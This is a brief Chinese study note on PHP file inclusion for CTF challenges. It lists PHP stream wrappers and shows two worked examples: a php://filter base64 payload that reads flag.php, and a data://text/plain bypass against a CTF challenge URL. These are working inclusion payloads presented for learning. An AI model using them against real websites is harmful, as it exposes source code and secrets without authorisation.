文件包含
include(文件包含)
php伪协议
常见的php伪协
1)file:// 访问本地文件系统
2)http:// 访问HTTP(S)网址
3)ftp:// 访问FTP(S)URL
4)php:// 访问各个输出输入流
5)zlib:// 处理压缩流
6)data:// 读取数据
7)glob:// 查找匹配的文件路径模式
8)phar:// PHP归档
9)rar:// RAR数据压缩
data绕过
https://blog.csdn.net/weixin_44032232/article/details/109005766
例题1
传入file得到源码
php://filter/convert.base64-encode/resource=flag.php
然后base64解密即可
例题2 PseudoProtocol
传入文件
?xxx=php://filter/convert.base64-encode/resource=hint.php
根据提示去访问php
试试data绕过 data://text/plain
http://node4.anna.nssctf.cn:28143/test2222222222222.php?a=data://text/plain,I want flag
文件包含
http://example.com/2024/04/08/文件上传/